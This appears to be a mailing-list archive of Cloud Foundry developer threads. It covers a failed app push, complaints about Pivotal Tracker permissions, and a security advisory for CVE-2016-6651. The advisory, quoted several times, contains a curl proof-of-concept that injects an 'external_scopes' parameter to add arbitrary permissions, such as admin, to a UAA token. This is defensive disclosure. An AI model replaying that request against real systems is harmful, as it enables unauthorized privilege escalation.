What is the system you are targeting? For example, a bosh lite install,
PCF-dev, PWS, Bluemix, other? If it's a system you deployed, which CF
Release & Diego release are you using?

Also, can you push *any* applications to it successfully? Maybe try a few
samples from here [1] and see if any of them work.

2016-09-28T07:05:58.000+00:00 [APP] **ERR Usage: /tmp/lifecycle/launcher

<app directory> <start command> <metadata>**

It's this output that has me concerned. You might also want to check the
cell logs to see if there's any additional output on why the launcher is
failing or what arguments it's being given (that it clearly doesn't like).

Dan

[1] - https://github.com/cloudfoundry-samples/



On Wed, Sep 28, 2016 at 3:44 AM, Mohan V <mohan221213(a)gmail.com> wrote:

I am trying to push the simple spring boot app in pcf.
I am completely new to pcf.
I was created manifest.yml file which contain following data:-

applications:
- name: PivotalPushTest
host: PivotalPushTest
memory: 512M
instances: 1
path:
/root/Desktop/PivotalPushTest/target/PivotalPustTest-0.0.1-SNAPSHOT.jar

but when I am pushing this app via cf push command I am getting following
error:-

cf push
Using manifest file /root/Desktop/PivotalPushTest/manifest.yml

Creating app PivotalPushTest in org ORGNAME / space Java-Hadoop as
username(a)domainname.com...
OK

Using route PivotalPushTest.url.com
Binding PivotalPushTest.url.com to PivotalPushTest...
OK

Uploading PivotalPushTest...
Uploading app files from: /tmp/unzipped-app911037164
Uploading 6.1K, 16 files
Done uploading
OK

Starting app PivotalPushTest in org ORGNAME / space Java-Hadoop as
username(a)domainname.com...
Downloading python_buildpack...
Downloading php_buildpack...
Downloading java_buildpack_offline...
Downloading null_buildpack...
Downloading go_buildpack_1-6...
Downloading staticfile_buildpack...
Downloading binary_buildpack...
Downloading ruby_buildpack...
Downloading nodejs_buildpack...
Downloading go_buildpack...
Downloaded python_buildpack
Downloaded nodejs_buildpack
Downloaded binary_buildpack
Downloaded php_buildpack
Downloaded go_buildpack
Downloaded go_buildpack_1-6
Downloaded ruby_buildpack
Downloaded java_buildpack_offline
Downloaded null_buildpack
Downloaded staticfile_buildpack
Creating container
Successfully created container
Downloading app package...
Downloaded app package (6.6K)
Staging...
-----> Nothing to do.
**No start command detected; command must be provided at runtime**
Exit status 0
Staging complete
Uploading droplet, build artifacts cache...
Uploading droplet...
Uploading build artifacts cache...
Uploaded build artifacts cache (109B)
Uploaded droplet (3.7K)
Uploading complete

0 of 1 instances running, 1 crashed
FAILED
Error restarting application: Start unsuccessful

TIP: use 'cf logs PivotalPushTest --recent' for more information

In Apps Manager Logs:-
OUT Exit status 1
2016-09-28T07:05:58.000+00:00 [APP] **ERR Usage: /tmp/lifecycle/launcher
<app directory> <start command> <metadata>**
2016-09-28T07:05:58.000+00:00 [CELL] OUT Exit status 2
2016-09-28T07:05:58.000+00:00 [API] OUT App instance exited with guid
637a95a7-4def-4c43-b00e-454ca6f584f8 payload:
{"instance"=>"460e1817-d616-495e-407e-49991b0026b0", "index"=>0,
"reason"=>"CRASHED", "exit_description"=>"2 error(s) occurred:\n\n* 2
error(s) occurred:\n\n* Exited with status 1\n* cancelled\n* cancelled",
"crash_count"=>1, "crash_timestamp"=>1475046358426721004,
"version"=>"e54e765b-8472-41d5-b14c-eec3f1d41401"}
2016-09-28T07:05:58.000+00:00 [CELL] OUT Creating container
2016-09-28T07:05:58.000+00:00 [CELL] OUT Successfully created container
2016-09-28T07:05:58.000+00:00 [CELL] OUT Starting health monitoring of
container
2016-09-28T07:05:58.000+00:00 [APP] OUT Exit status 1
2016-09-28T07:05:58.000+00:00 [APP] **ERR Usage: /tmp/lifecycle/launcher
<app directory> <start command> <metadata>**
2016-09-28T07:05:58.000+00:00 [CELL] OUT Exit status 2
2016-09-28T07:05:59.000+00:00 [API] OUT App instance exited with guid
637a95a7-4def-4c43-b00e-454ca6f584f8 payload:
{"instance"=>"06f0d873-0050-4e66-6bc8-11ec83ec369f", "index"=>0,
"reason"=>"CRASHED", "exit_description"=>"2 error(s) occurred:\n\n* 2
error(s) occurred:\n\n* Exited with status 1\n* cancelled\n* cancelled",
"crash_count"=>2, "crash_timestamp"=>1475046358988785723,
"version"=>"e54e765b-8472-41d5-b14c-eec3f1d41401"}
2016-09-28T07:05:59.000+00:00 [CELL] OUT Creating container
2016-09-28T07:05:59.000+00:00 [CELL] OUT Successfully created container
2016-09-28T07:05:59.000+00:00 [CELL] OUT Starting health monitoring of
container
2016-09-28T07:05:59.000+00:00 [APP] OUT Exit status 1
2016-09-28T07:05:59.000+00:00 [APP] ERR Usage: /tmp/lifecycle/launcher
<app directory> <start command> <metadata>
2016-09-28T07:05:59.000+00:00 [CELL] OUT Exit status 2

Please Help,
Mohan V.

Hi all -- a couple people reached out asking for a date for Viewers can
follow. We are currently targeting November of this year.

Thanks,
Lisa

On Mon, Sep 26, 2016 at 10:03 AM, Lisa Doan <ldoan(a)pivotal.io> wrote:

Hi all,

Just to re-iterate, we do have this feature prioritized on the Tracker
team. I'm sorry we haven't been able to deliver this yet, but there are a
number of other higher priority items that we must attend to before we can
begin this work. We will keep you posted as we get closer to implementing
this.

Thanks,
Lisa

On Sun, Sep 25, 2016 at 12:54 AM, Voelz, Marco <marco.voelz(a)sap.com>
wrote:

Dear Guillaume,

Thanks for your efforts in this direction. As I already stated before,
it is really a pain that you are not able to follow stories or comment when
not being a member in a Pivotaltracker project. However, github issues
aren’t more than a crutch, probably not even a good one.

For example, GH issues cannot be ordered. They are in the order of
creation, priorization is not visible. Therefore, if you look e.g. at the
BOSH mirror [1], there are a bunch of “unstarted” and “unscheduled” issues,
the first “started” one comes on page 2. For bugs, it gets more confusing.
Most people have the github bot activated, which creates a PT story for
each GH issue created. This is already confusing, because you have two
places where potentially updates to this bug could be located in, and
nobody knows where to look. Add in the mirroring, and now you have three
places, see an example for the buildpacks [2]. All of this is not your
fault, it is a restriction on how GH deals with issues and the fact that
we’re distributing information over more than one place.

While I appreciate your efforts and time spent on this: I strongly feel
that is an issue that can only be solved by one of two options:
• The Pivotaltracker team implementing the necessary functionality
• Migrating to a different tracker

I’m trying all I can to push for the first option by talking to Dan and
Lisa, but other features seem to be more important to the PT team. In
November, it has been a year since I asked for this, so my confidence isn’t
very high that it is going to happen at all. For me that just means option
two is getting more and more realistic every day.

Warm regards
Marco

[1] https://github.com/cf-tm-bot/bosh/issues
[2] https://github.com/cloudfoundry/staticfile-buildpack/issues/85



-----Original Message-----
From: Guillaume Berche <bercheg(a)gmail.com>
Date: Saturday, 24 September 2016 at 12:29
To: "Discussions about Cloud Foundry projects and the system overall." <
cf-dev(a)lists.cloudfoundry.org>
Cc: Chip Childers <cchilders(a)cloudfoundry.org>, "cholick(a)gmail.com" <
cholick(a)gmail.com>, Dan Podsedly <dpodsedly(a)pivotal.io>, Lisa Doan <
ldoan(a)pivotal.io>, "Voelz, Marco" <marco.voelz(a)sap.com>
Subject: Re: [cf-dev] Re: FW: issue tracker permissions

Hi,


The mirroring of foundation projects is around 60% complete. See [5]
for more detailed coverage. This should enable community members to watch
the most active foundation backlogs. I received no notifications of
negative side effects of this mirroring so
far. I'll proceed with mirroring the remaining projects in the next
days/weeks.

There are interesting next steps that could be tackled, such as
enabling commenting on the backlogs, or searching across all foundation
backlog history, see [3]. Let me know if you have interests in discussing
these next steps and current challenges faced by
the mirroring process. The upcoming Frankfurt cfsummit unconference
on monday might be a good place for this, I'd propose a subject if I
receive some interest.


Thanks,


Guillaume.






Guillaume.




On Mon, Sep 5, 2016 at 10:21 PM, Guillaume Berche
<bercheg(a)gmail.com> wrote:

Hi,


We have prototyped at Orange an automatic mirroring of Pivotal
Tracker (PT) stories into github issues. See pivotaltrackermirror at [1],
and the experimental mirror of the buildpack tracker at [2]. I'd like to
thanks the buildpacks team for accepting to join
this experiment and providing us with feedback in the past few
weeks.

We hope this could bring the following benefits to the CF community:

1. allow use of the
watching notifications <https://help.github.com/artic
les/about-notifications/#types-of-notifications> github feature to
track progress on public pivotal trackers projects: all stories or selected
stories of interest.
2. allow use of
github search features <https://help.github.com/artic
les/searching-github> to search Pivotal Tracker content (e.g. accross
multiple mirrored PT projects, or along with other github repositories
hosting the associated code)
3. allow use of
github @mentions <https://help.github.com/artic
les/basic-writing-and-formatting-syntax/#mentioning-users-and-teams> to
contact github accounts associated with PT public projects contributors, in
the context with a specific mirrored story
4. mirrored content becomes discoverable: search engines index it,
making it easier to find mirrored PT content such as a stack trace

This is still experimental work. We would like to hear community
feedback about this initiative (how is it useful?), as well as core
contributor teams (are there unexpected side-effects that need to be
handled beyond what we fixed so far [3]?) Do you have
suggestions for enhancements: can you comment/vote/improve in [3]?


Our plan is to progressively extend this experiment to more trackers
listed in [5] (in a rate of a few projects per week). Please report issues
on [3] if you observe negative side effects, or reply to this email if you
have concerns about this mirroring.



There still a fair amount of work ahead to convert this experiment
into a stable tool, and opportunities to provide some new cool features to
the community. Contributions are welcome :-)



Thanks,


Guillaume.



ps: I also recently noticed a PT slack integration [4] that would
also cover use-case #1 (get notifications for all stories in a tracker).
I'm not yet sure what it takes to add it to a given channel.


[1]
https://github.com/orange-cloudfoundry/pivotaltrackermirror <
https://github.com/orange-cloudfoundry/pivotaltrackermirror>
[2] https://github.com/cf-tm-bot/buildpacks
[3]
https://github.com/orange-cloudfoundry/pivotaltrackermirror/issues <
https://github.com/orange-cloudfoundry/pivotaltrackermirror/issues>
[4]
https://cloudfoundry.slack.com/apps/A0F82E7H8-pivotal-tracker <
https://cloudfoundry.slack.com/apps/A0F82E7H8-pivotal-tracker>
[5]
https://github.com/cloudfoundry-community/cf-docs-contrib/wiki <
https://github.com/cloudfoundry-community/cf-docs-contrib/wiki>





Guillaume.




On Sun, May 29, 2016 at 8:05 PM, John Wong
<gokoproject(a)gmail.com> wrote:

Just an idea... Is there a feature in Tracker to always cc
someone/some email address? For non security and non confidential stories
we can Cc this email address automatically which will post to a google
group and a thread will be built as comment is added.
This at least allow a read-only mirror.


Just a thought...


On Sunday, May 29, 2016, Voelz, Marco <marco.voelz(a)sap.com> wrote:

Dear Dan, dear Lisa, dear Chip, dear community,

sorry for digging out this old issue again and again. If you are
just tuning in, here is the situation
·
I like Pivotal Tracker as a product
·
I have to use Tracker for my daily work, as it is currently
mandatory for all CFF projects and all of them use it
·
The restrictions in pivotal tracker make it hard to impossible to do
the daily stuff you want to do within a large open-source community.

After initially bringing this up in November last year, here are a
few of the problems I addressed with Dan in a hangout session in February:
·
To follow stories in a project you need to be a member of that
project. Therefore, you cannot track progress on stories in other projects.
·
To comment on stories, the same restrictions as above apply

It has been 3 months since Dan and I talked, I’ve checked back every
4 weeks with him and what I’ve heard so far is ideas. I haven’t seen a
prototype, any specifics on the current state,
any planning details. It’s not like I’m demanding this feature
should be done by now – I just want to know what is going on.

I have to say I am very unhappy in how this topic is treated. From
my point of view, it seems like there is a huge lack of transparency and
feedback. Please, let me know what’s going on.
I don’t want to switch to a different tracker, such as e.g. trello,
but if the requirements of a large open-source community aren’t heard, then
I don’t know what else to do about this.

Warm regards
Marco

PS: What about a public tracker backlog in tracker, so people can
follow their favorite feature stories and see where they are in the
planning and when they’re done?


On 16/01/16 13:09, "Voelz, Marco" <marco.voelz(a)sap.com> wrote:





Dear all,



it has now been more than a month since I sent my feedback
concerning this feature to the tracker team – I haven't received any
reaction to it.

@Chip:
Is there an option you could weigh in for this from the Foundation
perspective? That would be great!



Sorry for being so stubborn about this, but in my opinion this is a
crucial feature for a bug tracker/backlog which is used in an open-source
product. I know that all the people
working directly at pivotal don't feel the pain, because they can
either talk directly to everyone in person or have the necessary rights to
comment/follow in the other projects, but for everyone else this is really,
really a problem.



Warm regards

Marco



On 09/12/15 21:20, "Voelz, Marco" <marco.voelz(a)sap.com> wrote:




Thanks for pointing me to this link. However, we seem to have the
same problem here: This seems like a fire-and-forget solution. Where does
this item go? How can I send it to
other people and have them +1 it, like it, follow it, favorite it
or whatever is necessary to indicate that there is more than 1 person
wanting this feature?




Thanks and warm regards

Marco



On 09/12/15 20:01, "Amit Gupta" <agupta(a)pivotal.io> wrote:




If you're logged in to Tracker, there's a "Help & Updates" link at
the top, and one of the options is Provide Feedback.


On Wed, Dec 9, 2015 at 10:59 AM, Voelz, Marco <marco.voelz(a)sap.com>
wrote:

I'd happily submit a feature request to build up some visible demand
for this – could you point me to the right channel here?




Thanks and warm regards

Marco



On 08/12/15 23:01, "Dieu Cao" <dcao(a)pivotal.io> wrote:





Unfortunately in order to follow a story in tracker, the minimum
required level is "member" which allows you to create/comment/delete
stories in tracker.

I would suggest submitting a request to the pivotal tracker team to
help build up evidence that this is a feature that people want.



-Dieu



On Tue, Dec 8, 2015 at 12:49 PM, Matt Cholick <cholick(a)gmail.com>
wrote:

Sorry to resurrect an older thread, but I wanted to chime in that
this is a frustration I have too. There are several stories in the various
CF teams public backlogs that I'd
like to keep track of.


Is it possible for community members to get enough permissions on
our tracker accounts to add ourselves to the follow list?



-Matt



On Mon, Nov 23, 2015 at 3:10 AM, Koper, Dies <
diesk(a)fast.au.fujitsu.com> wrote:

Hi Marco, Jan,

I sent an email to Tracker support about that last week because we
were hoping to close CLI feature requests on GH and let people follow the
stories on Tracker. Support confirmed that people need to have R/W access
to a project to do that.
I have just replied to ask if they'd consider an enhancement. Not
sure what the proper channel would be to get such a story prioritized.
Will let you know if I get a reply.

Regards,
Dies Koper
Cloud Foundry CLI PM

-----Original Message-----
From: Voelz, Marco [mailto:marco.voelz(a)sap.com]
Sent: Monday, November 23, 2015 8:00 PM
To: Discussions about Cloud Foundry projects and the system overall.
Subject: [cf-dev] Re: FW: issue tracker permissions

Thanks Jan for bringing that up, I've had similar problems with that
as well. Any ideas on how to solve this? Is this a feature that the tracker
team actively works on?
Hitting cmd+r every few days on the same stories doesn't seem like
the best way to stay informed about your favorite features.

Warm regards
Marco



On 19/11/15 09:23, "Sievers, Jan" <jan.sievers(a)sap.com> wrote:

>>Hi,
>>
>>I was trying to watch a story I am interested in
>>https://www.pivotaltracker.com/n/projects/892938/stories/105493826
>>
>>
>>I do have an account but it seems I don't have permissions to
watch nor to comment.
>>
>>Is there something I missed?
>>
>>Regards
>>Jan
>>





































































--
Sent from Jeff Dean's printf() mobile console

Anyone know off hand if CC uses online or offline validation? If
configurable what config would we look for to know if it is online or
offline?

Thanks,
Mike

On Mon, Sep 26, 2016 at 12:58 PM, Molly Crowther <
mcrowther(a)cloudfoundry.org> wrote:

Hello all,

In the interest of full public disclosure, the CFF Security Team would
also like to share some additional information about this vulnerability
that will aid in testing and remediation. Please let us know if you have
any questions or concerns.

Thanks,
Molly Crowther
Cloud Foundry Foundation Security Team
Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

curl https://login.urlredacted.com/oauth/token
<https://login.run.pivotal.io/oauth/token> \

-H"Accept: Application/json" \

-u "cf:" \

-d "username=<username here>" \

-d "password=<password here>" \

-d "client_id=cf" \

-d "grant_type=password" \

-d "response_type=token" \

-d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:

{

"access_token": "redacted for readability",

"expires_in": 599,

"jti": "redacted for readability",

"refresh_token": "redacted for readability",

"scope": "openid … cloud_controller.test",

"token_type": "bearer"

}

cloud_controller.test is an arbitrary string, but may as well be
cloud_controller.admin.

Applications that perform off-line validation will happily accept the
inserted string as a permission. Applications that use online validations,
i.e. the use of the /check_token UAA API endpoint, are not vulnerable - the
UAA validates the permissions against what’s in the database (uaadb).

A patched system will ignore the external_scopes parameter completely,
and cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <
mcrowther(a)cloudfoundry.org> wrote:

CVE-2016-6651: Privilege Escalation in UAA
Severity

High
Vendor

Cloud Foundry Foundation
Versions Affected

-

Cloud Foundry release v242 and earlier versions
-

UAA release v3.7.0 & earlier versions
-

UAA bosh release (uaa-release) v16 & earlier versions

Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.
Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

-

Upgrade to Cloud Foundry v243 [1] or later
-

For standalone UAA users
-

For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
Release to v3.7.3[2], v3.4.5[3] or v3.3.0.6[4]
-

For users using standalone UAA Version 2.X.X, please upgrade to
UAA Release to v2.7.4.8 [5]
-

For users using UAA bosh release, please upgrade to UAA-Release
v17 [6] if upgrading to v3.7.3 [2] ,v12.6 [7] if upgrading to v3.4.5[3] or
v11.7 [8] if upgrading to v3.3.0.6[4]

Credit

SAP HCP Security Team
References

-

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v243
-

[2] https://github.com/cloudfoundry/uaa/releases/tag/3.7.3
-

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.4.5
-

[4] https://github.com/cloudfoundry/uaa/releases/tag/3.3.0.6
-

[5] https://github.com/cloudfoundry/uaa/releases/tag/2.7.4.8
-

[6] https://github.com/cloudfoundry/uaa-release/releases/tag/v17
-

[7] https://github.com/cloudfoundry/uaa-release/releases/tag/v12.6
-

[8] https://github.com/cloudfoundry/uaa-release/releases/tag/v11.7

History2016-09-26: Initial vulnerability report published

wrote:

Hello all,

In the interest of full public disclosure, the CFF Security Team would
also like to share some additional information about this vulnerability
that will aid in testing and remediation. Please let us know if you have
any questions or concerns.

Thanks,
Molly Crowther
Cloud Foundry Foundation Security Team
Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

curl https://login.urlredacted.com/oauth/token
<https://login.run.pivotal.io/oauth/token> \

-H"Accept: Application/json" \

-u "cf:" \

-d "username=<username here>" \

-d "password=<password here>" \

-d "client_id=cf" \

-d "grant_type=password" \

-d "response_type=token" \

-d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:

{

"access_token": "redacted for readability",

"expires_in": 599,

"jti": "redacted for readability",

"refresh_token": "redacted for readability",

"scope": "openid … cloud_controller.test",

"token_type": "bearer"

}

cloud_controller.test is an arbitrary string, but may as well be
cloud_controller.admin.

Applications that perform off-line validation will happily accept the
inserted string as a permission. Applications that use online validations,
i.e. the use of the /check_token UAA API endpoint, are not vulnerable - the
UAA validates the permissions against what’s in the database (uaadb).

A patched system will ignore the external_scopes parameter completely,
and cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <
mcrowther(a)cloudfoundry.org> wrote:

CVE-2016-6651: Privilege Escalation in UAA
Severity

High
Vendor

Cloud Foundry Foundation
Versions Affected

-

Cloud Foundry release v242 and earlier versions
-

UAA release v3.7.0 & earlier versions
-

UAA bosh release (uaa-release) v16 & earlier versions

Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.
Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

-

Upgrade to Cloud Foundry v243 [1] or later
-

For standalone UAA users
-

For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
Release to v3.7.3[2], v3.4.5[3] or v3.3.0.6[4]
-

For users using standalone UAA Version 2.X.X, please upgrade to
UAA Release to v2.7.4.8 [5]
-

For users using UAA bosh release, please upgrade to UAA-Release
v17 [6] if upgrading to v3.7.3 [2] ,v12.6 [7] if upgrading to v3.4.5[3] or
v11.7 [8] if upgrading to v3.3.0.6[4]

Credit

SAP HCP Security Team
References

-

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v243
-

[2] https://github.com/cloudfoundry/uaa/releases/tag/3.7.3
-

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.4.5
-

[4] https://github.com/cloudfoundry/uaa/releases/tag/3.3.0.6
-

[5] https://github.com/cloudfoundry/uaa/releases/tag/2.7.4.8
-

[6] https://github.com/cloudfoundry/uaa-release/releases/tag/v17
-

[7] https://github.com/cloudfoundry/uaa-release/releases/tag/v12.6
-

[8] https://github.com/cloudfoundry/uaa-release/releases/tag/v11.7

History2016-09-26: Initial vulnerability report published

wrote:

CVE-2016-6651: Privilege Escalation in UAA
Severity

High
Vendor

Cloud Foundry Foundation
Versions Affected

-

Cloud Foundry release v242 and earlier versions
-

UAA release v3.7.0 & earlier versions
-

UAA bosh release (uaa-release) v16 & earlier versions

Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.
Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

-

Upgrade to Cloud Foundry v243 [1] or later
-

For standalone UAA users
-

For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
Release to v3.7.3[2], v3.4.5[3] or v3.3.0.6[4]
-

For users using standalone UAA Version 2.X.X, please upgrade to UAA
Release to v2.7.4.8 [5]
-

For users using UAA bosh release, please upgrade to UAA-Release v17
[6] if upgrading to v3.7.3 [2] ,v12.6 [7] if upgrading to v3.4.5[3] or
v11.7 [8] if upgrading to v3.3.0.6[4]

Credit

SAP HCP Security Team
References

-

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v243
-

[2] https://github.com/cloudfoundry/uaa/releases/tag/3.7.3
-

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.4.5
-

[4] https://github.com/cloudfoundry/uaa/releases/tag/3.3.0.6
-

[5] https://github.com/cloudfoundry/uaa/releases/tag/2.7.4.8
-

[6] https://github.com/cloudfoundry/uaa-release/releases/tag/v17
-

[7] https://github.com/cloudfoundry/uaa-release/releases/tag/v12.6
-

[8] https://github.com/cloudfoundry/uaa-release/releases/tag/v11.7

History2016-09-26: Initial vulnerability report published

Hi all,

Just to re-iterate, we do have this feature prioritized on the Tracker
team. I'm sorry we haven't been able to deliver this yet, but there are a
number of other higher priority items that we must attend to before we can
begin this work. We will keep you posted as we get closer to implementing
this.

Thanks,
Lisa

On Sun, Sep 25, 2016 at 12:54 AM, Voelz, Marco <marco.voelz(a)sap.com>
wrote:

Dear Guillaume,

Thanks for your efforts in this direction. As I already stated before, it
is really a pain that you are not able to follow stories or comment when
not being a member in a Pivotaltracker project. However, github issues
aren’t more than a crutch, probably not even a good one.

For example, GH issues cannot be ordered. They are in the order of
creation, priorization is not visible. Therefore, if you look e.g. at the
BOSH mirror [1], there are a bunch of “unstarted” and “unscheduled” issues,
the first “started” one comes on page 2. For bugs, it gets more confusing.
Most people have the github bot activated, which creates a PT story for
each GH issue created. This is already confusing, because you have two
places where potentially updates to this bug could be located in, and
nobody knows where to look. Add in the mirroring, and now you have three
places, see an example for the buildpacks [2]. All of this is not your
fault, it is a restriction on how GH deals with issues and the fact that
we’re distributing information over more than one place.

While I appreciate your efforts and time spent on this: I strongly feel
that is an issue that can only be solved by one of two options:
• The Pivotaltracker team implementing the necessary functionality
• Migrating to a different tracker

I’m trying all I can to push for the first option by talking to Dan and
Lisa, but other features seem to be more important to the PT team. In
November, it has been a year since I asked for this, so my confidence isn’t
very high that it is going to happen at all. For me that just means option
two is getting more and more realistic every day.

Warm regards
Marco

[1] https://github.com/cf-tm-bot/bosh/issues
[2] https://github.com/cloudfoundry/staticfile-buildpack/issues/85



-----Original Message-----
From: Guillaume Berche <bercheg(a)gmail.com>
Date: Saturday, 24 September 2016 at 12:29
To: "Discussions about Cloud Foundry projects and the system overall." <
cf-dev(a)lists.cloudfoundry.org>
Cc: Chip Childers <cchilders(a)cloudfoundry.org>, "cholick(a)gmail.com" <
cholick(a)gmail.com>, Dan Podsedly <dpodsedly(a)pivotal.io>, Lisa Doan <
ldoan(a)pivotal.io>, "Voelz, Marco" <marco.voelz(a)sap.com>
Subject: Re: [cf-dev] Re: FW: issue tracker permissions

Hi,


The mirroring of foundation projects is around 60% complete. See [5]
for more detailed coverage. This should enable community members to watch
the most active foundation backlogs. I received no notifications of
negative side effects of this mirroring so
far. I'll proceed with mirroring the remaining projects in the next
days/weeks.

There are interesting next steps that could be tackled, such as
enabling commenting on the backlogs, or searching across all foundation
backlog history, see [3]. Let me know if you have interests in discussing
these next steps and current challenges faced by
the mirroring process. The upcoming Frankfurt cfsummit unconference
on monday might be a good place for this, I'd propose a subject if I
receive some interest.


Thanks,


Guillaume.






Guillaume.




On Mon, Sep 5, 2016 at 10:21 PM, Guillaume Berche
<bercheg(a)gmail.com> wrote:

Hi,


We have prototyped at Orange an automatic mirroring of Pivotal
Tracker (PT) stories into github issues. See pivotaltrackermirror at [1],
and the experimental mirror of the buildpack tracker at [2]. I'd like to
thanks the buildpacks team for accepting to join
this experiment and providing us with feedback in the past few weeks.

We hope this could bring the following benefits to the CF community:

1. allow use of the
watching notifications <https://help.github.com/artic
les/about-notifications/#types-of-notifications> github feature to track
progress on public pivotal trackers projects: all stories or selected
stories of interest.
2. allow use of
github search features <https://help.github.com/artic
les/searching-github> to search Pivotal Tracker content (e.g. accross
multiple mirrored PT projects, or along with other github repositories
hosting the associated code)
3. allow use of
github @mentions <https://help.github.com/artic
les/basic-writing-and-formatting-syntax/#mentioning-users-and-teams> to
contact github accounts associated with PT public projects contributors, in
the context with a specific mirrored story
4. mirrored content becomes discoverable: search engines index it,
making it easier to find mirrored PT content such as a stack trace

This is still experimental work. We would like to hear community
feedback about this initiative (how is it useful?), as well as core
contributor teams (are there unexpected side-effects that need to be
handled beyond what we fixed so far [3]?) Do you have
suggestions for enhancements: can you comment/vote/improve in [3]?


Our plan is to progressively extend this experiment to more trackers
listed in [5] (in a rate of a few projects per week). Please report issues
on [3] if you observe negative side effects, or reply to this email if you
have concerns about this mirroring.



There still a fair amount of work ahead to convert this experiment
into a stable tool, and opportunities to provide some new cool features to
the community. Contributions are welcome :-)



Thanks,


Guillaume.



ps: I also recently noticed a PT slack integration [4] that would
also cover use-case #1 (get notifications for all stories in a tracker).
I'm not yet sure what it takes to add it to a given channel.


[1]
https://github.com/orange-cloudfoundry/pivotaltrackermirror <
https://github.com/orange-cloudfoundry/pivotaltrackermirror>
[2] https://github.com/cf-tm-bot/buildpacks
[3]
https://github.com/orange-cloudfoundry/pivotaltrackermirror/issues <
https://github.com/orange-cloudfoundry/pivotaltrackermirror/issues>
[4]
https://cloudfoundry.slack.com/apps/A0F82E7H8-pivotal-tracker <
https://cloudfoundry.slack.com/apps/A0F82E7H8-pivotal-tracker>
[5]
https://github.com/cloudfoundry-community/cf-docs-contrib/wiki <
https://github.com/cloudfoundry-community/cf-docs-contrib/wiki>





Guillaume.




On Sun, May 29, 2016 at 8:05 PM, John Wong
<gokoproject(a)gmail.com> wrote:

Just an idea... Is there a feature in Tracker to always cc
someone/some email address? For non security and non confidential stories
we can Cc this email address automatically which will post to a google
group and a thread will be built as comment is added.
This at least allow a read-only mirror.


Just a thought...


On Sunday, May 29, 2016, Voelz, Marco <marco.voelz(a)sap.com> wrote:

Dear Dan, dear Lisa, dear Chip, dear community,

sorry for digging out this old issue again and again. If you are just
tuning in, here is the situation
·
I like Pivotal Tracker as a product
·
I have to use Tracker for my daily work, as it is currently mandatory
for all CFF projects and all of them use it
·
The restrictions in pivotal tracker make it hard to impossible to do
the daily stuff you want to do within a large open-source community.

After initially bringing this up in November last year, here are a
few of the problems I addressed with Dan in a hangout session in February:
·
To follow stories in a project you need to be a member of that
project. Therefore, you cannot track progress on stories in other projects.
·
To comment on stories, the same restrictions as above apply

It has been 3 months since Dan and I talked, I’ve checked back every
4 weeks with him and what I’ve heard so far is ideas. I haven’t seen a
prototype, any specifics on the current state,
any planning details. It’s not like I’m demanding this feature
should be done by now – I just want to know what is going on.

I have to say I am very unhappy in how this topic is treated. From my
point of view, it seems like there is a huge lack of transparency and
feedback. Please, let me know what’s going on.
I don’t want to switch to a different tracker, such as e.g. trello,
but if the requirements of a large open-source community aren’t heard, then
I don’t know what else to do about this.

Warm regards
Marco

PS: What about a public tracker backlog in tracker, so people can
follow their favorite feature stories and see where they are in the
planning and when they’re done?


On 16/01/16 13:09, "Voelz, Marco" <marco.voelz(a)sap.com> wrote:





Dear all,



it has now been more than a month since I sent my feedback concerning
this feature to the tracker team – I haven't received any reaction to it.

@Chip:
Is there an option you could weigh in for this from the Foundation
perspective? That would be great!



Sorry for being so stubborn about this, but in my opinion this is a
crucial feature for a bug tracker/backlog which is used in an open-source
product. I know that all the people
working directly at pivotal don't feel the pain, because they can
either talk directly to everyone in person or have the necessary rights to
comment/follow in the other projects, but for everyone else this is really,
really a problem.



Warm regards

Marco



On 09/12/15 21:20, "Voelz, Marco" <marco.voelz(a)sap.com> wrote:




Thanks for pointing me to this link. However, we seem to have the
same problem here: This seems like a fire-and-forget solution. Where does
this item go? How can I send it to
other people and have them +1 it, like it, follow it, favorite it or
whatever is necessary to indicate that there is more than 1 person wanting
this feature?




Thanks and warm regards

Marco



On 09/12/15 20:01, "Amit Gupta" <agupta(a)pivotal.io> wrote:




If you're logged in to Tracker, there's a "Help & Updates" link at
the top, and one of the options is Provide Feedback.


On Wed, Dec 9, 2015 at 10:59 AM, Voelz, Marco <marco.voelz(a)sap.com>
wrote:

I'd happily submit a feature request to build up some visible demand
for this – could you point me to the right channel here?




Thanks and warm regards

Marco



On 08/12/15 23:01, "Dieu Cao" <dcao(a)pivotal.io> wrote:





Unfortunately in order to follow a story in tracker, the minimum
required level is "member" which allows you to create/comment/delete
stories in tracker.

I would suggest submitting a request to the pivotal tracker team to
help build up evidence that this is a feature that people want.



-Dieu



On Tue, Dec 8, 2015 at 12:49 PM, Matt Cholick <cholick(a)gmail.com>
wrote:

Sorry to resurrect an older thread, but I wanted to chime in that
this is a frustration I have too. There are several stories in the various
CF teams public backlogs that I'd
like to keep track of.


Is it possible for community members to get enough permissions on our
tracker accounts to add ourselves to the follow list?



-Matt



On Mon, Nov 23, 2015 at 3:10 AM, Koper, Dies <
diesk(a)fast.au.fujitsu.com> wrote:

Hi Marco, Jan,

I sent an email to Tracker support about that last week because we
were hoping to close CLI feature requests on GH and let people follow the
stories on Tracker. Support confirmed that people need to have R/W access
to a project to do that.
I have just replied to ask if they'd consider an enhancement. Not
sure what the proper channel would be to get such a story prioritized.
